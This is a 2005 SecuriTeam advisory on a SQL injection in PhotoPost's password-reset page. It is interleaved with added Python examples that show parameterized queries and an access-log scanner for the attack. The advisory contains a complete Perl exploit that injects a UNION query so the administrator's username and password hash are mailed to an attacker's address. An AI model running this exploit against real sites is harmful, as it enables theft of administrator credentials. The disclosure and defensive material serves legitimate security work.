[UNIX] PhotoPost Arbitrary Data (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/17/05

To: list@securiteam.com
Date: 17 May 2005 10:41:44 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      PhotoPost Arbitrary Data (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.photopost.com/> PhotoPost is "a popular commercial image
    publishing software. Everyone loves showing off their photos! Add
    PhotoPost to your site, or let us install it for you, and your visitors
    will be able to upload their photos to galleries on your site and interact
    in photo discussions. Join the 3,500+ sites that are already using
    PhotoPost and add a fun new dimension to your website". A vulnerability
    caused by PhotoPost's reliance on magic_quotes allows a remote attacker to
    make the program execute arbitrary SQL statements, with which a user can
    disclose the MD5 hash of the administrator password.

    DETAILS

    PhotoPost (PP from here on) is built on a highly risky principle for
    filtering input data: it relies entirely on PHP's magic_quotes setting,
    which PHP documents as follows:
    magic_quotes_gpc boolean
    Sets the magic_quotes state for GPC (Get/Post/Cookie) operations. When
    magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash)
    and NUL's are escaped with a backslash automatically.

    A large percentage of PP users neglect to turn magic_quotes on. It is a
    good idea not to rely on user action for something as essential as data
    filtering, and instead to write the escaping into the application itself,
    based on the mysql_escape_string/mysql_real_escape_string functions. A few
    lines of native code would have removed that "human" factor entirely. Many
    users have no idea what magic_quotes is, what it is for, or where their
    negligence will lead them, despite the warning PP shows during
    installation. Looking at the architecture PP is built on, it becomes clear
    that PP should not even attempt to install itself on systems with
    magic_quotes turned off.
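To make the advisory's point concrete, here is an added example (not code from PhotoPost or from the advisory) that emulates what magic_quotes_gpc does to a request parameter, shows the SQL text that the "splice the parameter into the statement" pattern produces with the setting on and off, and contrasts it with the application-side handling the advisory asks for: validate the parameter in code and bind it as a query parameter. The users table, its rows and the hash placeholders are constructed for the demo; the real PhotoPost schema is not on the page beyond the column names the exploit names.

```python
import re
import sqlite3

# Constructed sample rows standing in for PhotoPost's users table; the real
# schema is not on the page beyond the column names the advisory mentions.
SAMPLE_USERS = [
    (1, "admin", "<constructed-md5-placeholder-1>"),
    (2, "alice", "<constructed-md5-placeholder-2>"),
]


def magic_quotes_gpc(value):
    """Emulate what PHP does to every GET/POST/Cookie value when
    magic_quotes_gpc is on: ' " and \\ get a backslash in front, NUL becomes \\0."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def build_sql_interpolated(raw_uid, magic_quotes_on):
    """The pattern the advisory criticises: the request parameter is spliced
    straight into the statement, and the only escaping is whatever the PHP
    runtime setting happens to apply. Returns the SQL text, not a result."""
    uid = magic_quotes_gpc(raw_uid) if magic_quotes_on else raw_uid
    return "SELECT username, password FROM users WHERE uid = %s" % uid


def parse_uid(raw_uid):
    """Application-side validation: uid is only ever a decimal integer, so
    anything else is rejected before a statement is built. This does not
    depend on any php.ini or .htaccess setting."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_uid):
        raise ValueError("uid must be a decimal integer")
    return int(raw_uid)


def open_sample_db():
    """In-memory SQLite stand-in for the MySQL database PhotoPost uses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_parameterized(conn, raw_uid):
    """Hardened lookup: validate first, then bind the value as a parameter so
    the database never parses user input as SQL."""
    uid = parse_uid(raw_uid)
    rows = conn.execute("SELECT username FROM users WHERE uid = ?", (uid,)).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    tainted = '0 union select "0"'   # constructed input containing quote characters
    print(build_sql_interpolated(tainted, magic_quotes_on=False))
    print(build_sql_interpolated(tainted, magic_quotes_on=True))
    conn = open_sample_db()
    print(lookup_parameterized(conn, "1"))
    try:
        lookup_parameterized(conn, tainted)
    except ValueError as exc:
        print("rejected:", exc)
```

Two things worth noticing when running it: magic_quotes only ever touches quote, backslash and NUL characters, so a parameter that is spliced into a numeric position without surrounding quotes reaches the database unchanged whether the setting is on or off; and the validated, parameterized lookup rejects the tainted input at the application boundary with no dependency on server configuration, which is exactly the "human factor" the advisory wants removed.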

    Solution:
    The vendor has been contacted. Upgrade to the latest version, or enable
    magic_quotes_gpc in .htaccess:
    php_value magic_quotes_gpc 1

    Exploit:
    #!/usr/bin/perl
    # PhotoPost Arbitrary Data Exploit
    # --------------------------------
    # INFPG - Hacking&Security Research
    #
    #
    # Use first the exploit code, then you'll get admin MD5 hash and user name
    # on your mail.
    #
    # Greats: Infam0us Gr0up team/crew/fans, Zone-H, securiteam, str0ke-milw0rm, addict3d,
    # Thomas-secunia, Yudha, Dcrab's, Kavling Community, 1st Indonesian Security,
    # Jasakom, ECHO, etc.. betst reagrds t0 whell.
    # Info: www.98.to/infamous
    #

    use strict;
    use warnings;
    use IO::Socket;

    if (@ARGV < 3) {
        system "clear";
        print "PhotoPost Arbitrary Data Exploit\n";
        print "\n-------------------------------\n";
        print "\nINFGP-Hacking&Security Research\n";
        print "\n\n";
        print "[?]Usage: perl $0 [host] [path] [mail] \n";
        exit(1);
    }

    system "clear";

    my $server = $ARGV[0];   # target host
    my $folder = $ARGV[1];   # path of the PhotoPost installation on the server
    my $mail   = $ARGV[2];   # mailbox the password-reset mail is sent to

    print "Connecting to host ...\n";
    my $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $server,
        PeerPort => "80",
    );
    unless ($socket) {
        die "Server is offline\n";
    }

    print "[+]Connected\n\n";
    print "[+]Building string core..\n";

    # Query string for member.php's password-reset action (ppaction=rpwd) with
    # the UNION injected into the uid parameter; $mail is concatenated in so the
    # reset mail goes to the supplied address.
    my $stringcore =
        'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",'
        . $mail
        . ',%20concat(username,"%20",%20password)%20from%20users';

    print "Sent 0day..\n\n";
    print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";
    print "Server Exploited\n";
    print "You should check $mail now";
    close($socket);
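For anyone operating a PhotoPost site, the request the exploit above sends is a single GET that is easy to spot in the web server's access log once the query string is percent-decoded. The following is an added example, not part of the advisory, that scans Apache combined-format lines for query-string values carrying SQL keywords. The log lines, IP addresses, the /gallery/ path and the mail address in them are constructed for the demo; the keyword list is a starting point to be tuned for the site's real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines; the second mirrors the shape of the
# request in the advisory (one GET to member.php with a UNION in the uid value).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/May/2005:10:41:44 +0200] "GET /gallery/showphoto.php?photo=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/May/2005:10:42:01 +0200] "GET /gallery/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20%220%22,x@example.net,%20concat(username,%22%20%22,%20password)%20from%20users HTTP/1.0" 200 312 "-" "-"',
    '203.0.113.5 - - [17/May/2005:10:43:10 +0200] "GET /gallery/member.php?ppaction=rpwd&uid=42 HTTP/1.1" 200 801 "-" "Mozilla/4.0"',
]

# Combined log format: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL keywords that have no business appearing inside a gallery parameter.
SQL_WORDS = re.compile(r"\b(union|select|concat)\b", re.IGNORECASE)


def decoded_query_values(target):
    """Yield (parameter, value) pairs with percent-encoding removed, so %20
    and %22 are seen as the space and quote the database would receive."""
    query = urlsplit(target).query
    pairs = []
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            pairs.append((key, value))
    return pairs


def suspicious_requests(lines):
    """Return one record per request whose decoded query values contain SQL
    keywords. Each record names the client, the script and the parameter."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        target = match.group("target")
        path = urlsplit(target).path
        for key, value in decoded_query_values(target):
            if SQL_WORDS.search(value):
                hits.append({
                    "ip": match.group("ip"),
                    "time": match.group("ts"),
                    "path": path,
                    "param": key,
                    "value": value,
                })
                break  # one record per request is enough
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("%(time)s %(ip)s %(path)s param=%(param)s value=%(value)r" % hit)
```

Decoding before matching matters: the exploit encodes its spaces as %20 and, as in the constructed line, quotes may arrive as %22, so a pattern applied to the raw log line would miss keyword boundaries. A legitimate password-reset request (the third line) passes through untouched because its uid is a plain integer.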

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:basher13@linuxmail.org> eric
    basher.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

